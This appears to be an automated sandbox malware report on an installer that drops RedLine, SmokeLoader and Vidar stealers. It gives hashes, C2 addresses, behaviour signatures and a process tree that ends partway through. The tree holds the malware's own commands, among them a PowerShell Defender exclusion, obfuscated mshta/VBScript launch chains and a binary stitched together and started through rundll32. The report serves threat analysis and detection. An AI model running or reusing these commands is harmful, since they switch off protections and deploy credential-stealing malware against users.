Resubmissions

13-10-2021 18:35

211013-w8lxmaegdr 10

13-10-2021 12:38

211013-pvkdbadhdm 10

13-10-2021 05:30

211013-f7nrtsdfa3 10

12-10-2021 20:25

211012-y7qwasdbh4 10

11-10-2021 21:02

211011-zvywtaabdq 10

Analysis

  • max time kernel
    758s
  • max time network
    1807s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    13-10-2021 05:30

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.4MB

  • MD5

    26f28bf2dc2b6afc0dd99cb6ea3879b8

  • SHA1

    9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05

  • SHA256

    5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa

  • SHA512

    5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b

Malware Config

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

redline

Botnet

media12

C2

91.121.67.60:2151

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.2

Botnet

933

C2

https://mas.to/@serg4325

Attributes
  • profile_id

    933

Extracted

Family

vidar

Version

41.3

Botnet

903

C2

https://mas.to/@oleg98

Attributes
  • profile_id

    903

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • UAC bypass 3 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 19 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 32 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 18 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 19 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • NTFS ADS 2 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:1036
    • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
      C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
      2⤵
        PID:4372
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
      1⤵
      • Modifies registry class
      PID:1936
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2580
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2708
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2696
            • C:\Windows\system32\wbem\WMIADAP.EXE
              wmiadap.exe /F /T /R
              2⤵
                PID:8012
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2448
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                  PID:2416
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1408
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1396
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                      1⤵
                        PID:1144
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1092
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:340
                          • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:808
                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3308
                              • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\setup_install.exe
                                "C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\setup_install.exe"
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of WriteProcessMemory
                                PID:3112
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3928
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                    5⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2992
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1736
                                  • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon20762bc3f6.exe
                                    Mon20762bc3f6.exe
                                    5⤵
                                    • Executes dropped EXE
                                    PID:1780
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:888
                                  • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon206b909958ed4.exe
                                    Mon206b909958ed4.exe /mixone
                                    5⤵
                                    • Executes dropped EXE
                                    PID:1220
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 660
                                      6⤵
                                      • Program crash
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4572
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 676
                                      6⤵
                                      • Program crash
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4892
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 684
                                      6⤵
                                      • Program crash
                                      PID:4968
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 784
                                      6⤵
                                      • Program crash
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5032
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 844
                                      6⤵
                                      • Program crash
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4676
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 900
                                      6⤵
                                      • Program crash
                                      PID:3064
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 916
                                      6⤵
                                      • Program crash
                                      PID:5100
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 1188
                                      6⤵
                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                      • Program crash
                                      PID:3680
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2392
                                  • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon20927aab1e5.exe
                                    Mon20927aab1e5.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:2140
                                    • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon20927aab1e5.exe
                                      C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon20927aab1e5.exe
                                      6⤵
                                      • Executes dropped EXE
                                      PID:496
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2408
                                  • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon204014f13870f5e.exe
                                    Mon204014f13870f5e.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2288
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2188
                                  • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon203f01ac7e6.exe
                                    Mon203f01ac7e6.exe
                                    5⤵
                                    • Executes dropped EXE
                                    PID:2248
                                    • C:\Windows\SysWOW64\mshta.exe
                                      "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon203f01ac7e6.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                      6⤵
                                        PID:3888
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon203f01ac7e6.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon203f01ac7e6.exe" ) do taskkill /F -Im "%~NxU"
                                          7⤵
                                            PID:4188
                                            • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                              09xU.EXE -pPtzyIkqLZoCarb5ew
                                              8⤵
                                              • Executes dropped EXE
                                              PID:4764
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                9⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4968
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                  10⤵
                                                    PID:5692
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                  9⤵
                                                    PID:6276
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                      10⤵
                                                      • Loads dropped DLL
                                                      • Modifies registry class
                                                      PID:5656
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                        11⤵
                                                          PID:3924
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                          11⤵
                                                            PID:4620
                                                          • C:\Windows\SysWOW64\control.exe
                                                            control .\R6f7sE.I
                                                            11⤵
                                                              PID:2200
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                12⤵
                                                                • Loads dropped DLL
                                                                PID:3292
                                                                • C:\Windows\system32\RunDll32.exe
                                                                  C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                  13⤵
                                                                    PID:4664
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                      14⤵
                                                                      • Loads dropped DLL
                                                                      PID:1984
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /F -Im "Mon203f01ac7e6.exe"
                                                          8⤵
                                                          • Kills process with taskkill
                                                          PID:4956
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2552
                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon206d48916f93c5.exe
                                                    Mon206d48916f93c5.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3856
                                                    • C:\Users\Admin\AppData\Roaming\7402998.scr
                                                      "C:\Users\Admin\AppData\Roaming\7402998.scr" /S
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1380
                                                    • C:\Users\Admin\AppData\Roaming\8999844.scr
                                                      "C:\Users\Admin\AppData\Roaming\8999844.scr" /S
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      PID:4340
                                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5084
                                                    • C:\Users\Admin\AppData\Roaming\1558333.scr
                                                      "C:\Users\Admin\AppData\Roaming\1558333.scr" /S
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4428
                                                    • C:\Users\Admin\AppData\Roaming\8022644.scr
                                                      "C:\Users\Admin\AppData\Roaming\8022644.scr" /S
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4144
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c Mon209c830507d573.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2296
                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon209c830507d573.exe
                                                    Mon209c830507d573.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:3940
                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon209c830507d573.exe
                                                      C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon209c830507d573.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:708
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe
                                                  4⤵
                                                    PID:1688
                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon2083f8d8970a0b2d.exe
                                                      Mon2083f8d8970a0b2d.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3644
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe
                                                    4⤵
                                                      PID:2916
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon20b6f9d5bd03a305.exe
                                                        Mon20b6f9d5bd03a305.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:3288
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe
                                                      4⤵
                                                        PID:2096
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe
                                                        4⤵
                                                          PID:3432
                                                  • \??\c:\windows\system32\svchost.exe
                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                    1⤵
                                                    • Suspicious use of SetThreadContext
                                                    • Modifies registry class
                                                    PID:1452
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                      2⤵
                                                      • Drops file in System32 directory
                                                      • Checks processor information in registry
                                                      • Modifies data under HKEY_USERS
                                                      • Modifies registry class
                                                      PID:5796
                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon20d3b8b752.exe
                                                    Mon20d3b8b752.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Checks computer location settings
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1348
                                                    • C:\Users\Admin\Pictures\Adobe Films\WxwavbRxeRzSnFEFzZf7Af_U.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\WxwavbRxeRzSnFEFzZf7Af_U.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:4540
                                                    • C:\Users\Admin\Pictures\Adobe Films\cc2J3uyozfNde2McckdaZDy_.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\cc2J3uyozfNde2McckdaZDy_.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Drops file in Program Files directory
                                                      PID:4780
                                                      • C:\Users\Admin\Documents\X3KU5SvQD2sd8vXcTOEHAIb7.exe
                                                        "C:\Users\Admin\Documents\X3KU5SvQD2sd8vXcTOEHAIb7.exe"
                                                        3⤵
                                                        • Checks computer location settings
                                                        PID:6508
                                                        • C:\Users\Admin\Pictures\Adobe Films\M1_ZXoRKWgFBqvsfrZOXgAIp.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\M1_ZXoRKWgFBqvsfrZOXgAIp.exe"
                                                          4⤵
                                                            PID:4648
                                                          • C:\Users\Admin\Pictures\Adobe Films\7CR34eQR0r1lfyRrmGEYbLEu.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\7CR34eQR0r1lfyRrmGEYbLEu.exe"
                                                            4⤵
                                                              PID:5872
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                5⤵
                                                                  PID:808
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im chrome.exe
                                                                    6⤵
                                                                    • Kills process with taskkill
                                                                    PID:5864
                                                              • C:\Users\Admin\Pictures\Adobe Films\0sS2K5VHpg_PObCJ0r5eqCR0.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\0sS2K5VHpg_PObCJ0r5eqCR0.exe"
                                                                4⤵
                                                                  PID:824
                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                    "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\0sS2K5VHpg_PObCJ0r5eqCR0.exe"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\0sS2K5VHpg_PObCJ0r5eqCR0.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )
                                                                    5⤵
                                                                      PID:4388
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\0sS2K5VHpg_PObCJ0r5eqCR0.exe" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\0sS2K5VHpg_PObCJ0r5eqCR0.exe" ) do taskkill -iM "%~NXI" -f
                                                                        6⤵
                                                                          PID:7436
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill -iM "0sS2K5VHpg_PObCJ0r5eqCR0.exe" -f
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:7556
                                                                    • C:\Users\Admin\Pictures\Adobe Films\jNL_QbG1NqfqQq30S07TkK4P.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\jNL_QbG1NqfqQq30S07TkK4P.exe"
                                                                      4⤵
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:6952
                                                                    • C:\Users\Admin\Pictures\Adobe Films\JZIvQQN10uyVO455yHMiQQFQ.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\JZIvQQN10uyVO455yHMiQQFQ.exe"
                                                                      4⤵
                                                                        PID:6588
                                                                        • C:\Users\Admin\AppData\Roaming\1176829.scr
                                                                          "C:\Users\Admin\AppData\Roaming\1176829.scr" /S
                                                                          5⤵
                                                                            PID:5700
                                                                          • C:\Users\Admin\AppData\Roaming\8157004.scr
                                                                            "C:\Users\Admin\AppData\Roaming\8157004.scr" /S
                                                                            5⤵
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:7396
                                                                          • C:\Users\Admin\AppData\Roaming\5792847.scr
                                                                            "C:\Users\Admin\AppData\Roaming\5792847.scr" /S
                                                                            5⤵
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:7736
                                                                          • C:\Users\Admin\AppData\Roaming\5348347.scr
                                                                            "C:\Users\Admin\AppData\Roaming\5348347.scr" /S
                                                                            5⤵
                                                                            • Suspicious behavior: SetClipboardViewer
                                                                            PID:7844
                                                                          • C:\Users\Admin\AppData\Roaming\4318943.scr
                                                                            "C:\Users\Admin\AppData\Roaming\4318943.scr" /S
                                                                            5⤵
                                                                              PID:8016
                                                                          • C:\Users\Admin\Pictures\Adobe Films\8811tQ08L27Lh5U9c7n4txF8.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\8811tQ08L27Lh5U9c7n4txF8.exe" /mixtwo
                                                                            4⤵
                                                                              PID:6248
                                                                            • C:\Users\Admin\Pictures\Adobe Films\ajt97gA7fZR1Q269Nj2OqJG8.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\ajt97gA7fZR1Q269Nj2OqJG8.exe"
                                                                              4⤵
                                                                                PID:4344
                                                                              • C:\Users\Admin\Pictures\Adobe Films\9YfY8_C7F5SFXY5fpToFMmwV.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\9YfY8_C7F5SFXY5fpToFMmwV.exe"
                                                                                4⤵
                                                                                  PID:4584
                                                                                • C:\Users\Admin\Pictures\Adobe Films\cDHwmTqVWnqprki5pc63fNRl.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\cDHwmTqVWnqprki5pc63fNRl.exe"
                                                                                  4⤵
                                                                                    PID:6216
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-HTH47.tmp\cDHwmTqVWnqprki5pc63fNRl.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-HTH47.tmp\cDHwmTqVWnqprki5pc63fNRl.tmp" /SL5="$901DE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\cDHwmTqVWnqprki5pc63fNRl.exe"
                                                                                      5⤵
                                                                                        PID:6788
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-UUEVL.tmp\DYbALA.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-UUEVL.tmp\DYbALA.exe" /S /UID=2709
                                                                                          6⤵
                                                                                          • Drops file in Drivers directory
                                                                                          • Adds Run key to start application
                                                                                          PID:7516
                                                                                          • C:\Program Files\Windows Security\WFFKPQOJLN\foldershare.exe
                                                                                            "C:\Program Files\Windows Security\WFFKPQOJLN\foldershare.exe" /VERYSILENT
                                                                                            7⤵
                                                                                              PID:4280
                                                                                            • C:\Users\Admin\AppData\Local\Temp\d3-ceba9-f05-f5399-5ee03fbf1d3e0\Gulomikoce.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\d3-ceba9-f05-f5399-5ee03fbf1d3e0\Gulomikoce.exe"
                                                                                              7⤵
                                                                                              • Checks computer location settings
                                                                                              PID:6764
                                                                                            • C:\Users\Admin\AppData\Local\Temp\ad-d968e-140-5d39d-eef5632e3cf08\Ganejydare.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\ad-d968e-140-5d39d-eef5632e3cf08\Ganejydare.exe"
                                                                                              7⤵
                                                                                                PID:6104
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ve0it4ml.zli\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet & exit
                                                                                                  8⤵
                                                                                                    PID:4740
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ve0it4ml.zli\Calculator%20Installation.exe
